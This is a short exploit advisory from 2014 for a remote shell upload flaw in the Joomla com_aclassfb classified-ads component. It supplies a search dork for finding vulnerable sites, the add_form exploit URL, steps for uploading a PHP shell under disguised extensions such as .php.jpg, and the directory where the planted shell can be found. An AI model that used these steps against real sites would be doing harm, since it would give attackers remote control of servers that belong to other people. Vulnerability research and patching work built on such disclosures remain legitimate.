The Joomla Aclassfb component suffers from a remote shell upload vulnerability.
9d0fb8ff59906454f8f77b6cd1a8d6cbd5c42f068d8b4fc058718a4e32f3316f
#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Dork : inurl:com_aclassfb
File Upload
http://127.0.0.1/index.php?option=com_aclassfb
Exploit :
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC :
1. Select Category
2. After Select Category, Click Post New Ad
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell